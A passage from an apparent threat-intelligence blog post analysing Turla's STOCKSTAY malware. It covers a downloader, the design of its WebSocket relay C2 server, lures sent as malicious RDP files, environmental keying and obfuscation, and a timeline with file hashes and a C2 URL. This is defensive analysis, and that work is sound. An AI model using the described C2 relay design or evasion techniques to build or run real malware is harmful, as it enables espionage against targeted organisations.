</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 1: Backdoor commands supported by STOCKSTAY.STOCKTRADER</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Related Downloaders and Installers</span></h4>
<h5><span>STOCKSTAY.MARKETMAKER</span></h5>
<p><span>STOCKSTAY.MARKETMAKER is a proxy-aware downloader written in .NET using the Windows Forms framework that downloads and extracts additional payloads from a remote server, establishes persistence through Windows registry modifications, and runs silently in the background with no user interface. This downloader has been observed masquerading as "MicrosoftUpdateOneDrive" to appear legitimate while setting up multiple autorun entries to execute the core components of STOCKSTAY.</span></p>
<h5><span>.NET AppDomainManager</span></h5>
<p><span>During our analysis, GTIG identified what we believe to be an early development sample of STOCKSTAY.MARKETMAKER which, instead of downloading the required components, was dependent on external mechanisms (such as </span><a href="https://attack.mitre.org/techniques/T1574/014/" rel="noopener" target="_blank"><span>.NET AppDomainManager injection</span></a><span>) for the initial deployment of samples to the target host.</span></p>
<h4><span>STOCKSTAY Server-Side Controller</span></h4>
<p><span>GTIG identified a publicly accessible GitHub repository containing a Python implementation of the victim-facing STOCKSTAY WebSocket server controller. The lightweight design of the server component appears to supplement the threat actor’s usage of third-party hosting platforms such as </span><a href="https://render.com/" rel="noopener" target="_blank"><span>Render</span></a><span> platform which provides a platform for hosting web services, including </span><a href="https://render.com/docs/websocket" rel="noopener" target="_blank"><span>WebSockets</span></a><span>. The inability for the server to decrypt inbound messages prevents introspection by platform operators, and further obfuscates the location of the threat actor’s dedicated infrastructure. This architecture somewhat resembles Turla’s multi-hop KAZUAR C2 infrastructure.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig4.max-1000x1000.png" alt="Overview of STOCKSTAY C2 Infrastructure">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="s9mt0">Figure 4: Overview of STOCKSTAY C2 Infrastructure</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The server extends </span><code>tornado.websocket.WebSocketHandler</code><span> to provide the interface described in Table 2, under the path </span><code>/ws</code><span>; aligning with all observed STOCKSTAY WebSocket C2 URLs.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>Event</span></strong></p>
</td>
<td>
<p><strong><span>Description</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.check_origin" rel="noopener" target="_blank"><span>WebSocketHandler.check_origin</span></a></p>
</td>
<td>
<p><span>Hard-coded to return True to </span><span>accept all cross-origin traffic.</span></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.open" rel="noopener" target="_blank"><span>WebSocketHandler.open</span></a></p>
</td>
<td>
<p><span>Logs the client’s IP address using the following string format:</span></p>
<p><code>WebSocket open. IP: {client_ip}</code></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.on_message" rel="noopener" target="_blank"><span>WebSocketHandler.on_message</span></a></p>
</td>
<td>
<p><span>Handles inbound messages from the connected client.</span></p>
<p><span>Inbound messages are base64-decoded before being parsed as JSON into an object internally known as a “package”.</span></p>
<p><span>Each “package” contains an “action” and a “container”, which provide the request’s type and associated data, respectively. The following describes the handling logic of each action type.</span></p>
<p><strong>Action: </strong><strong>send</strong></p>
<p><span>The server extracts the following attributes from the inbound message’s “container” and inserts them into a new row within the local </span><code>weather_data</code><span> database table.</span></p>
<p><code>container.target</code></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The STOCKSTAY client populates this field with the </span><code>internal_id</code><span> or </span><code>i_id</code><span> field from the config file.</span></p>
</li>
</ul>
<p><code>container.sender</code></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>The STOCKSTAY client populates this field with the unique client uuid generated on first execution.</span></p>
</li>
</ul>
<p><code>container.message</code></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>This field contains the encrypted message body in a format referred to within the STOCKSTAY client as “CryptoContainer”. </span></p>
</li>
</ul>
<p><span>On completion, the server logs the following message:</span></p>
<p><code>Action: send; trgt={target_id}; sndr={sender_id}</code></p>
<p><strong>Action: </strong><strong>recv</strong></p>
<p><span>Inbound </span><code>recv</code><span> requests simply specify the </span><code>container.sender</code><span> attribute, which corresponds with the client’s unique identifier.</span></p>
<p><span>The server then retrieves all messages from the </span><code>weather_data</code><span> database table where the target identifier (“degrees” column) matches the specified </span><code>container.sender</code><span>. This has the effect of allowing the client to retrieve all messages intended for it, such as those sent to the server by an upstream C2 controller.</span></p>
<p><span>Each matching row is returned to the client in the following format, before being deleted from the database.<br><br></span></p>
<pre class="language-plain"><code>{
	"target": degrees,
	"sender": pressure,
	"message": wdata,
	"ip": coords,
	"time": datetime
}</code></pre>
<p><span>On completion, the server logs the following message:</span></p>
<p><code>Action: recv; sndr={sender}</code></p>
</td>
</tr>
<tr>
<td>
<p><a href="https://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketHandler.on_close" rel="noopener" target="_blank"><span>WebSocketHandler.on_close</span></a></p>
</td>
<td>
<p><span>Logs the client’s IP address using the following string format:</span></p>
<p><code>WebSocket close. IP: {client_ip}</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 2: Overview of STOCKSTAY WebSocket Server Interface</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Database Structure</span></h4>
<p><span>The server maintains a local SQLite3 database under the filename </span><code>weather_data1.db</code><span>, structured as shown in Tables 3 and 4.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Column</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>id</code></p>
</td>
<td>
<p><span>Primary key</span></p>
</td>
</tr>
<tr>
<td>
<p><code>degrees</code></p>
</td>
<td>
<p><span>Recipient's UUID from </span><code>container.target</code></p>
</td>
</tr>
<tr>
<td>
<p><code>pressure</code></p>
</td>
<td>
<p><span>Sender's UUID from </span><code>container.sender</code></p>
</td>
</tr>
<tr>
<td>
<p><code>wdata</code></p>
</td>
<td>
<p><span>Message data from </span><code>container.message</code></p>
</td>
</tr>
<tr>
<td>
<p><code>coords</code></p>
</td>
<td>
<p><span>Sender's IP address, extracted from </span><code>X-Forwarded-For</code><span> header, or </span><code>none_ip</code><span> if no sender specified.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>status</code></p>
</td>
<td>
<p><span>Defaults to 0 - doesn't appear to be used or returned to the client.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>datetime</code></p>
</td>
<td>
<p><span>Time of row creation</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 3: </span><code>weather_data</code><span> database table structure</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Column</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>id</code></p>
</td>
<td>
<p><span>Primary key</span></p>
</td>
</tr>
<tr>
<td>
<p><code>data</code></p>
</td>
<td>
<p><span>Log message</span></p>
</td>
</tr>
<tr>
<td>
<p><code>datetime</code></p>
</td>
<td>
<p><span>Time of creation</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 4: </span><code>log</code><span> database table structure</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Key Operational Characteristics</span></h3>
<h4><span>Consistent Use of Academic or Diplomatic Lure Content</span></h4>
<p><span>The threat actor(s) involved in STOCKSTAY operations appear to have an affinity for integrating academia and diplomacy into their infrastructure and lure/decoy content, including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>compromising an email account belonging to a Ukrainian university to disseminate phishing emails;</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>using the names of an academic institution within the file name of a malicious RDP file;</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>compromising a diplomatic education platform for phishing and distribution of malicious RDP files;</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>using “education” and “diplo” within registered phishing domains; and</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>using “DiplomacyEduAI” as the product name within STOCKSTAY MSI files.</span></p>
</li>
</ul>
<h4><span>Persistent Ukrainian Targeting</span></h4>
<p><span>A significant proportion of STOCKSTAY operations observed by GTIG have been targeted at Government or Military organizations within Ukraine, consistent with Russian interests in relation to the ongoing conflict between the two countries. The threat actor has been observed utilizing in-country compromised infrastructure, including compromised government services, to deploy both STOCKSTAY and a range of supplementary payloads, in support of these operations. </span></p>
<h4><span>Suspected European Targeting</span></h4>
<p><span>A smaller number of STOCKSTAY operations observed by GTIG appear to have been targeted at European entities. Early development samples of STOCKSTAY were identified in various European nations, including Italy, the Netherlands, Poland, and Germany; however, we have been largely unable to confirm the intended victims for the majority of these early infections, nor whether these samples were identified as a result of the threat actor testing their capabilities against publicly available virus scanning services such as VirusTotal. GTIG was able to identify, in at least one case, the targeting of entities associated with, or interested in, a foreign affairs ministry in Europe in relation to phishing and suspected STOCKSTAY activity. </span></p>
<h4><span>Deployment via Malicious RDP Files</span></h4>
<p><span>GTIG observed STOCKSTAY being deployed following successful phishing attempts using malicious RDP configuration files. The RDP files were designed to create a connection from the victim’s device to actor-controlled infrastructure, through which the actor could then deploy subsequent payloads.</span></p>
<p><span>In one operation in early 2025, GTIG identified a phishing email, claiming to be sent by a defense-related training academy, containing a malicious RDP file attachment. A short time following the victim’s connection to the actor’s infrastructure, the actor deployed STOCKSTAY.MARKETMAKER, a .NET downloader designed to retrieve and install the full STOCKSTAY suite on the victim’s device. </span></p>
<p><span>Later, in mid-2025, GTIG identified similar malicious RDP files being hosted on a compromised diplomatic-themed education platform, luring victims into downloading and executing the file under the guise of enabling access to an online training portal. GTIG was unable to confirm whether STOCKSTAY was ultimately deployed as a result of this operation; however, overlaps in the actor’s infrastructure and education-themed lures for both operations may suggest STOCKSTAY was the intended payload. </span></p>
<h4><span>Deployments at Multiple Stages of Operations</span></h4>
<p><span>Through GTIG’s visibility, we have identified that the threat actor uses STOCKSTAY at multiple distinct stages of their operations. </span></p>
<p><span>In the first instance, the threat actor uses STOCKSTAY during operations to gain initial access into environments which haven’t yet been subject to the group’s reconnaissance activities. In these instances, STOCKSTAY is configured with hard-coded configuration passwords, which can be trivially extracted by analysts. We observed this type of infection stemming from the group’s phishing operations, where the threat actor is unable to determine exactly where in the victim’s network they are going to gain their initial foothold.</span></p>
<p><span>When the threat actor deploys STOCKSTAY at a later stage of operation, following reconnaissance, STOCKSTAY is configured to incorporate environmental keying for its configuration, requiring the malware to be executed either on a specific host, by a specific user, within a specific domain, or a pre-determined combination of the these attributes. This configuration implies that, at this stage, the actor knows exactly which machine is being targeted, likely through existing accesses to the target environment. This was seen within Ukrainian networks where STOCKSTAY was deployed toward the end of an operation which had previously relied heavily on the group’s other tools, such as KAZUAR. </span></p>
<h3><span>Overlaps with KAZUAR</span></h3>
<h4><span>K1MORPHER String Obfuscation</span></h4>
<p><span>In April 2025, GTIG observed STOCKSTAY being updated to implement a new string obfuscation mechanism, based around an obscure pseudo-random number generation algorithm named “Squirrel3”, which was </span><a href="https://www.gdcvault.com/play/1024365/Math-for-Game-Programmers-Noise" rel="noopener" target="_blank"><span>presented</span></a><span> at Game Developers Conference 2017. </span></p>
<p><span>GTIG later identified versions of STOCKSTAY containing some of their original class-names, which showed the code responsible for runtime string deobfuscation being contained within a class named “K1.Morpher”. Analysis of K1MORPHER shows the ability to perform runtime deobfuscation of a range of datatypes, such as strings, integers, and arrays. </span></p>
<p><span>In June 2025 GTIG noticed K1MORPHER code appearing in samples of KAZUAR. KAZUAR has historically used its own simple but effective code and string obfuscation techniques to evade detection, such as: the insertion of junk code; replacing static constant values with the results of XOR operations; and large quantities of unique character substitution tables. The actor’s use of K1MORPHER within STOCKSTAY appears to be trending toward mimicking KAZUAR’s multi-class obfuscation techniques, where obfuscation is handled by multiple distinct classes, as observed in suspected test builds of STOCKSTAY hosted on a compromised Cypriot website in April 2024.</span></p>
<h4><span>Implant Architecture</span><span> </span></h4>
<p><span>Since at least 2024, KAZUAR has been observed being deployed using a multi-component architecture, whereby C2 communication, task orchestration, and task execution are managed by separate components. Within the KAZUAR ecosystem, these components are referred to as “BRIDGE”, “KERNEL”, and “WORKER”, respectively.</span></p>
<p><span>As of late 2023, GTIG identified a similar separation of responsibilities within the STOCKSTAY ecosystem, with the same responsibilities being separated into distinct components. C2 communication is managed by the component tracked by GTIG as STOCKSTAY.STOCKBROKER, while task orchestration and execution are handled by STOCKSTAY.STOCKMARKET and STOCKSTAY.STOCKTRADER, respectively.</span></p>
<h4><span>Environmental Keying</span></h4>
<p><span>Both KAZUAR and STOCKSTAY ecosystems have been observed using environmental keying to protect themselves from detection and analysis.</span></p>
<p><span>DIAMONDBACK, a dropper often deployed prior to KAZUAR in the execution chain, has made use of a hash of the target’s hostname in decrypting its payload, to prevent divulgence of its intentions outside of the target environment. Later versions of DIAMONDBACK can be configured to incorporate the target’s username and domain name in the hash required to decrypt the payload.</span></p>
<p><span>STOCKSTAY has been observed using the hash of the target’s hostname or domain name during the decryption of its configuration data, preventing disclosure of C2 infrastructure unless operating in the intended environment.</span></p>
<h4><span>Summary of Overlaps</span></h4>
<p><span>GTIG assesses with moderate confidence that STOCKSTAY and KAZUAR may be developed in-part by a common developer or team, with active development occurring in tandem between the two malware ecosystems. We believe that STOCKSTAY is being developed in KAZUAR’s image, with several design decisions likely spawning from the threat actor’s wealth of experience in conducting operations using this long-standing toolkit. Both ecosystems rely heavily on .NET development, and have been observed using compromised WordPress sites during various stages of their operations.</span></p>
<p><span>We assess with low confidence that our observations of STOCKSTAY being deployed alongside KAZUAR during active operations may be a result of the threat actor seeking to test new capabilities in active operations, particularly where they may be expecting their existing access to be remediated in the near future. </span></p>
<h3><span>STOCKSTAY Timeline</span></h3>
<p><span>GTIG has conducted a thorough investigation into the history of STOCKSTAY, identifying suspected development activity as far back as December 2022. What follows is our assessment of the timeline of events surrounding STOCKSTAY’s development and deployment. To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) within each observed operation section, and in a </span><a href="https://www.virustotal.com/gui/collection/ed88a43801b5c58b9be27fa74abaa278a48904f3cc1bc905f2d85e32448b96c5/iocs" rel="noopener" target="_blank"><span>GTI Collection</span></a><span> for registered users.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig5.max-1000x1000.png" alt="Timeline of STOCKSTAY observations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="qw6cr">Figure 5: Timeline of STOCKSTAY observations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>December 2022</span></h4>
<p><span>The version of the open-source websocket-sharp.dll bundled with the majority of observed STOCKSTAY.STOCKBROKER samples was last modified, according to timestamp information in MSI files and ZIP archives containing STOCKSTAY. Although built from an open-source library, this specific instance appears to have been compiled by the actor themselves, thus creating a uniquely identifiable artifact with which to track this malware’s continuous development.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>websocket-sharp.dll</code></p>
</td>
<td>
<p><span>Instance of open-source library used by the threat actor</span></p>
</td>
<td>
<p><code>d1e54270433a94aa3d45d888e4c62299bee3480eb2cb4a5489c7dda69d476c3e</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 5: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>September 21, 2023: Germany</span></h4>
<p><span>An early version of STOCKSTAY was uploaded to VirusTotal from Germany, under the filename “DriversPrinterGraphic.rar”. From the archive’s timestamps, it appears as though the sample was submitted within 20 minutes of being created, likely indicating this was submitted by the malware’s developer.</span></p>
<p><span>This version predates the malware’s separation into distinct role-based components, instead incorporating all core functionality into a single executable: StockMarketNews.exe. Additionally, this version of STOCKSTAY contained the user interface shown in Figure 6, which enables viewing/editing of configuration options and command messages, while still presenting as a stock market utility.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig6.max-1000x1000.png" alt="Early STOCKSTAY user-interface">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="qw6cr">Figure 6: Early STOCKSTAY user-interface</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>This particular STOCKSTAY sample uses a slightly different configuration file format; however, the underlying configuration options are consistent with later versions. This sample also utilizes environmental keying for its configuration file; using the lower-cased hostname of the intended target as the decryption password. GTIG has been unable to recover the password at this time.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>DriversPrinterGraphic.rar</code></p>
</td>
<td>
<p><span>RAR archive containing STOCKSTAY</span></p>
</td>
<td>
<p><code>e6d8192960a89d5480868b94088cccdaa1560f9c8a0b0282ced2b7c1f72341b6</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketNews.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY combined executable</span></p>
</td>
<td>
<p><code>1fc23ec18a94a599a34c74ef5f49a1e27acd37a07d5846661702b5e7e81a6a24</code></p>
</td>
</tr>
<tr>
<td>
<p><code>sample.conf</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>1a2ca8b8e0344fe3d80da7352206a470245443e2349a237bc093df934ddc011f</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 6: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>December 5 – 6, 2023: Netherlands</span></h4>
<p><span>A further RAR archive containing STOCKSTAY was submitted to VirusTotal at 2023-12-06 08:52:49 from the Netherlands, under the filename “apps_libwallets_v1.3.rar”. This archive was last modified the previous day at 2023-12-05 16:47:42. This pattern may indicate that the archive was created by the individual at the end of their working day, and then submitted the following day when they returned to the office.</span></p>
<p><span>This instance of STOCKSTAY was the first case observed by GTIG of the malware’s core functionality being separated into distinct role-based components, using the filenames shown in Table 7.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Component</strong></p>
</td>
<td>
<p><strong>Filename</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKMARKET</span></p>
</td>
<td>
<p><span>StockMarketView.exe</span></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKBROKER</span></p>
</td>
<td>
<p><span>StockMarketNet.exe</span></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><span>StockMarketSystem.exe</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 7: STOCKSTAY component filenames observed in December 2023</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><p><span>Similar to the sample observed in September 2023, this instance of STOCKSTAY also used environmental keying, however this instance used the target computer’s domain name as the configuration password. GTIG has been unable to recover the password at this time.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>apps_libwallets_v1.3.rar</code></p>
</td>
<td>
<p><span>RAR archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>81aabf646619ea5f4a72457cd3aa17c5988003d67e6454f45e7cb33613021bac</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketView.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>9164054d0bf0b7c8820da4f742860940998984555e65820e4fa8dd07b6bd67ec</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>34fcbe7e90fc87a4f3766469c19a64f24672d7adb99e0198f5ba10d58911368b</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketSystem.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>0a545dd1b703cddfb3d582c8c70f65f556bbd580bfa836a387121eb837bda61b</code></p>
</td>
</tr>
<tr>
<td>
<p><code>default.conf</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>2623c6e3c1f5a7b5e735a64813bc0e1382ae45831f5fadffb08c0e7b096627f7</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 8: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>January 2024: Ukraine</span></h4>
<p><span>GTIG conducted a review of an incident response conducted by Mandiant relating to a late-2023 compromise of a Ukrainian organization, in which we observed Turla deploying a wide range of tools into the victim’s network, including WILDDAY, DIAMONDBACK and KAZUAR, via malicious GPO installation from a compromised domain controller. This activity was accompanied by other simple scripts and backdoors to deploy malware across multiple machines in the infected organization. </span></p>
<p><span>During the review, GTIG identified evidence of STOCKSTAY execution on one of the hosts impacted by the infected domain controller. Multiple ZIP archives, each containing one of the core components of STOCKSTAY or its configuration, were uploaded to the domain controller. The files were found in a directory used for staging registry files used to install WILDDAY both prior to and after STOCKSTAY appeared on the host, as well as for staging output from an otherwise unknown Powershell backdoor (iclsClient.ps1) which was also observed running from the domain controller.</span></p>
<p><span>During this operation, an initial STOCKSTAY configuration file was deployed to the domain controller alongside the STOCKSTAY core component executables, however this file was not able to be decrypted using any known passwords or environmental identifiers. A short while later, Mandiant observed a second configuration file being deployed to the domain controller, this time encrypted using the domain name associated with the compromised network. GTIG assesses with moderate confidence that the deployment of the initial configuration file was either a mistake by the threat actor - perhaps deploying a configuration file associated with a different victim - or the result of a default or invalid configuration file being bundled with STOCKSTAY during initial deployment to prevent sensitive C2 details from being captured in the event of early detection of the malware in the victim’s environment.  </span></p>
<p><span>The successfully decrypted configuration defined a STOCKSTAY WebSocket C2 URL of </span><code>wss://wool-basalt-clock.glitch.me/ws</code><span>. Additionally, the configuration specified an operational time-frame of Monday to Friday between the hours of 0900 and 1800 on the victim's system. This time-based restriction is likely intended to blend C2 communications with normal business operations in the victim's network. This same time-frame has been observed in a majority of STOCKSTAY configuration files analyzed by GTIG.</span></p>
<p><span>Of particular note, toward the end of this operation, Mandiant identified firewall detections relating to one of KAZUAR’s C2 endpoints. GTIG assesses, with low to moderate confidence, that the threat actor could have been aware of the suspicion surrounding its C2 and deployed STOCKSTAY as a failsafe in case KAZUAR was identified and remediated, thus enabling reinfection at a later date, in the event that STOCKSTAY remained undetected.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://wool-basalt-clock.glitch.me/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 9: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>February 2024: Italy</span></h4>
<p><span>An MSI file configured to install STOCKSTAY was uploaded to VirusTotal at 2024-02-20 11:45:26 from Italy, under the filename “Copia.msi”. The MSI masqueraded as the </span><span>ILSpy application developed by ICSharpCodeTeam, and contained a large number of legitimate benign components. The MSI installed the core STOCKSTAY components under </span><code>%LOCALAPPDATA%/Programs/SMN/</code><span>, and enabled persistent execution via registry run keys. </span></p>
<p><span>The STOCKSTAY samples contained in the MSI were compiled between January 29 and January 31, 2024, with the configuration file last being modified on February 13, 2024, just a week before being submitted to VirusTotal.</span></p>
<p><span>In addition to the installation of STOCKSTAY, the MSI file contains a custom MSI action named “OpenUrl”. This action has the sequence number 1 in the InstallUISequence table, indicating it should be executed before any other actions. The custom action is configured to execute the following command:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>viewer.exe
https://circoloesteri.elezioni.idnet.it/admin-election/riepilogo.php</code></pre></div>
<div class="block-paragraph_advanced"><p><span>When viewed, the URL contains references to elections (“elezioni”) and the Italian organization “Circolo Degli Esteri”, which according to their official website (</span><a href="https://www.circoloesteri.it/" rel="noopener" target="_blank"><span>https://www.circoloesteri.it/</span></a><span>), was founded to “represent the Ministry of Foreign Affairs”. We do not currently assess that the actor was directly targeting Italian elections, and was instead using elections-related phishing lures to target victims. Due to limited visibility, we have been unable to identify any earlier stages of this particular operation, and cannot confirm the identity of the intended targets of any potential related phishing campaigns.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Foreign Affairs Club 1936

Approval of the 2023 Financial Statement

Analysis of the status of those registered to vote (automatically updates every 60 seconds)...
update 6:26:50

Total Voters: 915
Currently registered members with 2-tonte status: 364
Currently registered with status 4 Ready to vote: 5
Currently registered with status 3 - Voted 46
Voter turnout (votes cast on registered voters): 5.03%</code></pre></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
